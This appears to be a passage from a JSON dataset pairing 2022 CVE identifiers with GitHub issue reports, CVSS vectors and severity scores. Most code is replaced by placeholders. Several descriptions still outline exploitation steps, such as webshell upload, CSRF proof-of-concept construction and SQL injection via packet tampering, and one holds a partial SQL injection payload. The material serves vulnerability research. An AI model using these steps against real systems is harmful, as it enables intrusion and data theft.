        "description": "arbitrary file read vulnerability. analysis The location of the vulnerability is line NUMBERTAG in PATHTAG and we can see that the path parameter is passed directly to file_get_contents function without filtering FILETAG FILETAG poc After login as APITAG the file management interface and edit function FILETAG Get packets using brup Any file can be read after changing the path parameter FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.9,
        "impactScore": 3.6,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-23318",
        "Issue_Url_old": "https://github.com/ganaware/pcf2bdf/issues/4",
        "Issue_Url_new": "https://github.com/ganaware/pcf2bdf/issues/4",
        "Repo_new": "ganaware/pcf2bdf",
        "Issue_Created_At": "2022-01-11T12:41:03Z",
        "description": "Heap buffer overflow in pcf2bdf. Hello MENTIONTAG as discussed earlier: I have compiled pcf2bdf with address sanitization and fuzz tested inputs with AFL . The file attached causes a memory access violation. The actual input file is stored within the zipped folder attached. Input: APITAG Output: ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.1,
        "impactScore": 5.2,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-23319",
        "Issue_Url_old": "https://github.com/ganaware/pcf2bdf/issues/5",
        "Issue_Url_new": "https://github.com/ganaware/pcf2bdf/issues/5",
        "Repo_new": "ganaware/pcf2bdf",
        "Issue_Created_At": "2022-01-11T12:45:15Z",
        "description": "Segmentation fault ASAN Deadly Signal in pcf2bdf. Hello MENTIONTAG as discussed earlier: I have compiled pcf2bdf with address sanitization and fuzz tested inputs with AFL. The file is partially parsed before the program crashes due to a segmentation fault. The actual input file is stored within the zipped folder attached. Input: APITAG Output: ERRORTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-23331",
        "Issue_Url_old": "https://github.com/dataease/dataease/issues/1618",
        "Issue_Url_new": "https://github.com/dataease/dataease/issues/1618",
        "Repo_new": "dataease/dataease",
        "Issue_Created_At": "2022-01-11T05:27:34Z",
        "description": "Security APITAG APITAG NUMBERTAG Chrome NUMBERTAG Bug \u63cf\u8ff0 An authenticated user can access information about all users and change admin password Bug NUMBERTAG use demo login NUMBERTAG access api NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-23340",
        "Issue_Url_old": "https://github.com/laurent22/joplin/issues/6004",
        "Issue_Url_new": "https://github.com/laurent22/joplin/issues/6004",
        "Repo_new": "laurent22/joplin",
        "Issue_Created_At": "2022-01-11T12:59:44Z",
        "description": "Remote Code Execution vulnerability. APITAG APITAG Environment Joplin version: Joplin NUMBERTAG prod, win NUMBERTAG Platform: Windows OS specifics: Windows NUMBERTAG APITAG Steps to reproduce This is a serious security vulnerability. I do not wish to make the details public until the author is contacted. APITAG Describe what you expected to happen I want to contact the author individually using email or telegram Logfile APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-23363",
        "Issue_Url_old": "https://github.com/g33kyrash/Online-Banking-system/issues/15",
        "Issue_Url_new": "https://github.com/g33kyrash/online-banking-system/issues/15",
        "Repo_new": "g33kyrash/online-banking-system",
        "Issue_Created_At": "2022-01-14T01:51:17Z",
        "description": "There is a SQL injection vulnerability in FILETAG . First visit FILETAG FILETAG Enter any user and APITAG burp to capture packets FILETAG Modify the data package as follows, save as APITAG ERRORTAG execute APITAG APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-23375",
        "Issue_Url_old": "https://github.com/Zavy86/WikiDocs/issues/28",
        "Issue_Url_new": "https://github.com/zavy86/wikidocs/issues/28",
        "Repo_new": "zavy86/wikidocs",
        "Issue_Created_At": "2022-02-19T13:50:49Z",
        "description": "Multiple Vulnerabilities in APITAG NUMBERTAG APITAG Reflected XSS Injection First vulnerability in line NUMBERTAG FILETAG Second is in line NUMBERTAG FILETAG XSS directly using url: URLTAG NUMBERTAG APITAG Reflected XSS Injection Vulnerability in line NUMBERTAG FILETAG XSS directly using url: URLTAG }) PATHTAG NUMBERTAG SS NUMBERTAG E NUMBERTAG APITAG Debug mode can be enabled: Vulnerable lines are between NUMBERTAG FILETAG You can get sensitive information using debug mode: FILETAG NUMBERTAG APITAG Reflected Xss Injection: FILETAG NUMBERTAG APITAG Image upload, Authenticated Remote Code Execution: first, log in to the website and click edit button on the right top: FILETAG Before upload proccess, we have to create malicious payload image: FILETAG name: FILETAG payload : APITAG After that, you have to click image button on top and upload image: FILETAG Select malicious file and click upload: FILETAG In upload process, change file extension to the PHP in the POST request: FILETAG then the browser automatically sends another request to the malicious file: FILETAG Just browse it and try to execute some commands: FILETAG I hope you wil close these vulnerabilities ASAP.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-23379",
        "Issue_Url_old": "https://github.com/emlog/emlog/issues/144",
        "Issue_Url_new": "https://github.com/emlog/emlog/issues/144",
        "Repo_new": "emlog/emlog",
        "Issue_Created_At": "2022-01-14T14:04:01Z",
        "description": "emlog NUMBERTAG has SQL injection vulnerability. SQL injection exists in background batch deletion label\uff0cthe passed in key was not verified FILETAG Eventually, the APITAG parameter of APITAG can be passed in malicious code Function generating vulnerability ERRORTAG Verification FILETAG FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-23380",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/16",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/16",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2022-01-15T18:16:58Z",
        "description": "There is SQL blind injection at APITAG Edit\". FILETAG FILETAG CODETAG FILETAG FILETAG FILETAG PATHTAG FILETAG PATHTAG FILETAG PATHTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-23384",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/58",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/58",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2022-01-16T14:50:07Z",
        "description": "There is one CSRF vulnerability that can add the administrator account . After the administrator logged in, open the following one page admin,add. URLTAG / APITAG APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-23387",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/23",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/23",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2022-01-17T02:51:41Z",
        "description": "There is SQL blind injection at APITAG Update\". CODETAG FILETAG FILETAG FILETAG FILETAG FILETAG PATHTAG FILETAG PATHTAG FILETAG PATHTAG FILETAG PATHTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-23389",
        "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/59",
        "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/59",
        "Repo_new": "sanluan/publiccms",
        "Issue_Created_At": "2021-11-25T10:38:25Z",
        "description": "Arbitrary command execution vulnerability\uff08\u4efb\u610f\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff09. APITAG NUMBERTAG alue parameter has command execution vulnerability",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-23391",
        "Issue_Url_old": "https://github.com/tomoya92/pybbs/issues/171",
        "Issue_Url_new": "https://github.com/atjiu/pybbs/issues/171",
        "Repo_new": "atjiu/pybbs",
        "Issue_Created_At": "2022-01-18T03:18:26Z",
        "description": "This forum has a large number of xss vulnerabilities. The first is located at the home page search Enter in the search box APITAG FILETAG The second vulnerability is located in the backend In the topic editor in the background, enter ERRORTAG FILETAG FILETAG The third vulnerability is located at the topic search Enter in the search box APITAG FILETAG and many more ...",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-23596",
        "Issue_Url_old": "https://github.com/junrar/junrar/issues/73",
        "Issue_Url_new": "https://github.com/junrar/junrar/issues/73",
        "Repo_new": "junrar/junrar",
        "Issue_Created_At": "2022-01-27T03:29:04Z",
        "description": "FILETAG Environment (please complete the following information): OS: Mac OS NUMBERTAG Junrar version NUMBERTAG Additional context It seems this APITAG can reach [this while loop] ( URLTAG but never break.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-23638",
        "Issue_Url_old": "https://github.com/darylldoyle/svg-sanitizer/issues/71",
        "Issue_Url_new": "https://github.com/darylldoyle/svg-sanitizer/issues/71",
        "Repo_new": "darylldoyle/svg-sanitizer",
        "Issue_Created_At": "2022-02-14T16:03:26Z",
        "description": "Requesting more details on GHSA fq NUMBERTAG p NUMBERTAG qcc. It seems tag APITAG addressed a security vulnerability, see corresponding advisory URLTAG Corresponding commit at URLTAG contains a new test case FILETAG . Invoked as APITAG in browser, mime type APITAG ERRORTAG \u2192 no problem since APITAG is not a SVG element Invoked as APITAG in browser, mime type APITAG ERRORTAG \u2192 valid concern, since HTML is used in inline SVG \u2192 scripts are executed in browser \u2192 cross site scripting Conclusion & Alternative approach removing non SVG elements (e.g. APITAG ) seems to be fine, see URLTAG removing APITAG and APITAG nodes seems to be superfluous and leads to regressions like in NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-23652",
        "Issue_Url_old": "https://github.com/clastix/capsule-proxy/issues/188",
        "Issue_Url_new": "https://github.com/clastix/capsule-proxy/issues/188",
        "Repo_new": "clastix/capsule-proxy",
        "Issue_Created_At": "2022-02-18T19:53:04Z",
        "description": "Privilege escalation vulnerability via malicious APITAG header. A user crafting an API request directed at APITAG can get a privilege escalation using the Service Account of the proxy itself. This is done by passing the APITAG or APITAG header in the Connection header, using the same exploit described here: URLTAG > At this point, instead of impersonating the user and their permissions, the request will act as if it was from the APITAG management server~~ Capsule Proxy and incorrectly return the information.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-23812",
        "Issue_Url_old": "https://github.com/RIAEvangelist/node-ipc/issues/233",
        "Issue_Url_new": "https://github.com/riaevangelist/node-ipc/issues/233",
        "Repo_new": "RIAEvangelist/node-ipc",
        "Issue_Created_At": "2022-03-09T15:24:42Z",
        "description": "Remove the 'peacenotwar' module as it is literally malware. Remove the 'peacenotwar' module as it is literally malware > This code serves as a non destructive example of why controlling your node modules is important. The module literally then proceeds to write files to the host's device: URLTAG Don't get me wrong, I'm against all forms of war, but sabotaging people's dependencies is not the way to protest. Slava Ukraini",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-23812",
        "Issue_Url_old": "https://github.com/RIAEvangelist/node-ipc/issues/236",
        "Issue_Url_new": "https://github.com/riaevangelist/node-ipc/issues/236",
        "Repo_new": "RIAEvangelist/node-ipc",
        "Issue_Created_At": "2022-03-15T14:17:30Z",
        "description": "A package should never try to do unrelated things.. Give people a hamburger when they want one, do not try giving them a humberger with some shits.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-2385",
        "Issue_Url_old": "https://github.com/kubernetes-sigs/aws-iam-authenticator/issues/472",
        "Issue_Url_new": "https://github.com/kubernetes-sigs/aws-iam-authenticator/issues/472",
        "Repo_new": "kubernetes-sigs/aws-iam-authenticator",
        "Issue_Created_At": "2022-07-11T16:15:16Z",
        "description": "CVETAG : APITAG validation bypass. CVSS Rating: High URLTAG A security issue was discovered in aws iam authenticator where an allow listed IAM identity may be able to modify their username and escalate privileges. This issue has been rated high ( URLTAG and assigned CVETAG Am I vulnerable? Users are only affected if they use the APITAG template parameter to construct a username and provide different levels of access based on the username. Affected Versions aws iam authenticator NUMBERTAG How do I mitigate this vulnerability? Upgrading to NUMBERTAG mitigates this vulnerability. Prior to upgrading, this vulnerability can be mitigated by not using the APITAG template value to construct usernames. Fixed Versions aws iam authenticator NUMBERTAG Detection This issue affected the logged identity, and is not discernable from valid requests. Acknowledgements This vulnerability was reported by Gafnit Amiga from Lightspin. /area security /kind bug /committee security response /label official cve feed",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-23850",
        "Issue_Url_old": "https://github.com/kevinboone/epub2txt2/issues/17",
        "Issue_Url_new": "https://github.com/kevinboone/epub2txt2/issues/17",
        "Repo_new": "kevinboone/epub2txt2",
        "Issue_Created_At": "2022-01-22T14:00:27Z",
        "description": "FILETAG POC file at the bottom of this report. With ASAN Note: You can use ASAN for more direct verification. ERRORTAG ASAN Report ERRORTAG POC FILETAG Any issue plz contact with me: APITAG OR: twitter: MENTIONTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-23872",
        "Issue_Url_old": "https://github.com/emlog/emlog/issues/147",
        "Issue_Url_new": "https://github.com/emlog/emlog/issues/147",
        "Repo_new": "emlog/emlog",
        "Issue_Created_At": "2022-01-20T17:20:47Z",
        "description": "Emlog pro NUMBERTAG has xss stored in FILETAG via footer_info param.. + VULNERABLE A Stored Cross Site Scripting (XSS) injection vulnerability exists in Emlog pro version NUMBERTAG An attacker can inject arbitrary javascripts in FILETAG via footer_info param. + Date: PATHTAG + Exploit Author: Tr\u01b0\u01a1ng H\u1eefu Ph\u00fac Contact me: + Github: URLTAG + Facebook: URLTAG + Email: EMAILTAG + Product: Emlog pro + Version NUMBERTAG Description: The vulnerability is present in the PATHTAG and can be exploited throuth a POST request via the \u2018footer_info\u2019 param. + Impact: An attacker can send javascripts code through any vulnerable form field to change the design of the website or any information displayed to the user, saving the information persistently on the site (e.g. database). + Suggestions: You should limit tag script and HTML Event Attributes. FILETAG + File report: URLTAG + Video Poc: URLTAG + Proof of concept (POC): + Injection javascript: FILETAG + As can be seen from the following evidence, the content of the injection was correctly saved on the page (on the database) and executed. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.8,
        "impactScore": 2.7,
        "exploitabilityScore": 1.7
    },
    {
        "CVE_ID": "CVE-2022-23880",
        "Issue_Url_old": "https://github.com/taogogo/taocms/issues/25",
        "Issue_Url_new": "https://github.com/taogogo/taocms/issues/25",
        "Repo_new": "taogogo/taocms",
        "Issue_Created_At": "2022-01-19T07:45:25Z",
        "description": "A malicious file upload vulnerability exists in FILETAG of the file management function module.. This is the latest NUMBERTAG ersion of taocms. Organize and utilize steps in two steps\uff1a Step1\uff1a Audit the source code PATHTAG line NUMBERTAG and find that there may be arbitrary new files vulnerability: FILETAG Follow up $this >realpath and find that it comes from $this >path, and $this >path can be passed in through the get parameter (where SYS_ROOT is the root directory of the website): FILETAG Here you can construct the request package for the new APITAG file: FILETAG New FILETAG is successfully created: FILETAG Step2: It is also the PATHTAG file. It is found in line NUMBERTAG that there may be an arbitrary file writing vulnerability: FILETAG The written content $_POST FILETAG Successful connection to webshell FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-23882",
        "Issue_Url_old": "https://github.com/yeyinshi/tuzicms/issues/10",
        "Issue_Url_new": "https://github.com/yeyinshi/tuzicms/issues/10",
        "Repo_new": "yeyinshi/tuzicms",
        "Issue_Created_At": "2022-01-19T06:33:29Z",
        "description": "PATHTAG has APITAG PATHTAG NUMBERTAG Find where the file was uploaded FILETAG NUMBERTAG Use burpsuite to intercept requests, modify packets, and add payloads FILETAG FILETAG NUMBERTAG ulnerability analysis poc NUMBERTAG AND (SELECT NUMBERTAG FROM(SELECT COUNT( ),CONCAT(' FILETAG debugging process: FILETAG NUMBERTAG Repair suggestion before executing the APITAG function, filter the id",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-23887",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/59",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/59",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2022-01-21T03:30:48Z",
        "description": "APITAG NUMBERTAG CSRF vulnerability exists in the official APITAG NUMBERTAG csrf\u6f0f\u6d1e). This vulnerability allows arbitrary users to be deleted, There is a user with ID NUMBERTAG FILETAG Click delete and capture the package to generate the POC of CSRF, FILETAG Package the deletion request to dorp, and put the generated POC in the HTML page and send it to the administrator. When the administrator clicks the page, the user with ID NUMBERTAG can be deleted. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-23888",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/60",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/60",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2022-01-22T02:18:45Z",
        "description": "APITAG NUMBERTAG There is a CSRF vulnerability in the foreground in the official APITAG NUMBERTAG csrf\u6f0f\u6d1e). Prepare two accounts: test NUMBERTAG and test NUMBERTAG background settings allow users to contribute, Generate POC of CSRF with test NUMBERTAG First log in to test NUMBERTAG and comment on an article, and grab the request packet, FILETAG FILETAG Log in to TEST NUMBERTAG with another browser and open the web page of the generated POC, Triggered CSRF and successfully commented as TEST NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-23889",
        "Issue_Url_old": "https://github.com/yzmcms/yzmcms/issues/61",
        "Issue_Url_new": "https://github.com/yzmcms/yzmcms/issues/61",
        "Repo_new": "yzmcms/yzmcms",
        "Issue_Created_At": "2022-01-22T02:43:52Z",
        "description": "APITAG NUMBERTAG There are concurrent operations in the front desk of the official APITAG NUMBERTAG Prepare an account test NUMBERTAG comment at the bottom of an article, and grab the request package, FILETAG Send to repeater, FILETAG Manually send several times, you can batch brush malicious comments. FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-23898",
        "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/62",
        "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/62",
        "Repo_new": "ming-soft/mcms",
        "Issue_Created_At": "2022-01-20T13:28:38Z",
        "description": "MCMS NUMBERTAG SQLI. A suspicious point was found in the APITAG file APITAG Since the id of select maps to a method in Java, and this XML corresponds to Content, we looked directly in APITAG and found a call to APITAG Next we try to inject, see the top class definition of APITAG of the file, we can know that the route is APITAG , and then Adding the method to be called, we can get the route as APITAG , and from the placeholder of APITAG , we can know that the suspicious injection point is APITAG , and then try to inject CODETAG APITAG As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-23899",
        "Issue_Url_old": "https://github.com/ming-soft/MCMS/issues/63",
        "Issue_Url_new": "https://github.com/ming-soft/mcms/issues/63",
        "Repo_new": "ming-soft/mcms",
        "Issue_Created_At": "2022-01-20T13:42:42Z",
        "description": "MCMS NUMBERTAG PATHTAG SQLI. As you can see, the injection was successful, and the next step is to save the post package and put it into sqlmap to run APITAG Look up for filed and find the incoming parameter APITAG Since the parameter names are directly spliced with strings without filtering, then there may be a loophole, so let's move on to the next data chain APITAG APITAG Since the parameter names are directly spliced with strings without filtering, then there may be a loophole, so let's move on to the next data chain APITAG APITAG This block was found to have database calls APITAG Next we try to inject, see the file APITAG at the top of the class definition, you can know the route is APITAG , and then add the method to be called, you can get the route is APITAG , next try to inject ERRORTAG APITAG Next I wrote a py file for convenient validation, using delayed injection ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-23901",
        "Issue_Url_old": "https://github.com/skvadrik/re2c/issues/394",
        "Issue_Url_new": "https://github.com/skvadrik/re2c/issues/394",
        "Repo_new": "skvadrik/re2c",
        "Issue_Created_At": "2022-01-20T14:10:13Z",
        "description": "Stack overflow due to recursion in re2c/ APITAG /dead_rules.cc. Operating System Version\uff1aubuntu NUMBERTAG re2c version NUMBERTAG error function\uff1are2c::backprop NUMBERTAG ERROR: APITAG stack overflow on address NUMBERTAG ffdf3f NUMBERTAG ff8 (pc NUMBERTAG f8e0 bp NUMBERTAG sp NUMBERTAG ffdf3f NUMBERTAG T NUMBERTAG f8e0 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG APITAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG NUMBERTAG f8e4 in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) PATHTAG APITAG stack overflow PATHTAG in re2c::backprop(re2c::rdfa_t const&, bool , unsigned long, unsigned long) Test example link\uff1a URLTAG url Run the following command to repeat the error\uff1a $ ./re2c example",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-23903",
        "Issue_Url_old": "https://github.com/pearadmin/pear-admin-think/issues/1",
        "Issue_Url_new": "https://github.com/pearadmin/pear-admin-think/issues/1",
        "Repo_new": "pearadmin/pear-admin-think",
        "Issue_Created_At": "2022-01-21T04:34:40Z",
        "description": "There is a stored xss vulnerability exists in pear admin think APITAG Backend Log the xss will be execute FILETAG APITAG Code execution] true",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-24032",
        "Issue_Url_old": "https://github.com/jdordonezn/CVE-2022-24032/issues/1",
        "Issue_Url_new": "https://github.com/jdordonezn/cve-2022-24032/issues/1",
        "Repo_new": "jdordonezn/CVE-2022-24032",
        "Issue_Created_At": "2022-01-29T14:32:48Z",
        "description": "User enumeration in APITAG APITAG NUMBERTAG APITAG APITAG through NUMBERTAG is vulnerable to user enumeration. An attacker can identify valid usernames on the platform because a failed login attempt produces a different error message when the username is valid. APITAG NUMBERTAG Login attempt with invalid username FILETAG NUMBERTAG Login attempt with valid username FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24123",
        "Issue_Url_old": "https://github.com/marktext/marktext/issues/2946",
        "Issue_Url_new": "https://github.com/marktext/marktext/issues/2946",
        "Repo_new": "marktext/marktext",
        "Issue_Created_At": "2022-01-28T05:24:24Z",
        "description": "XSS to RCE vulnerability in Mermaid rendered. APITAG Description APITAG According to URLTAG , it will add a closing element at the end, which means it tries to parse it as HTML. FILETAG Versions APITAG version NUMBERTAG Operating system: APITAG NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.0,
        "impactScore": 6.0,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-24124",
        "Issue_Url_old": "https://github.com/casdoor/casdoor/issues/439",
        "Issue_Url_new": "https://github.com/casdoor/casdoor/issues/439",
        "Repo_new": "casdoor/casdoor",
        "Issue_Created_At": "2022-01-22T09:53:09Z",
        "description": "SQL injection vulnerability in field filter. The query API provides the field and value parameters to support query by field. It inserts the user's input into the raw SQL expression which can lead to a SQL injection vulnerability. APITAG And the APITAG is a public route that everyone can visit. Proof of concept: APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-24135",
        "Issue_Url_old": "https://github.com/78778443/QingScan/issues/17",
        "Issue_Url_new": "https://github.com/78778443/qingscan/issues/17",
        "Repo_new": "78778443/qingscan",
        "Issue_Created_At": "2022-01-24T07:41:45Z",
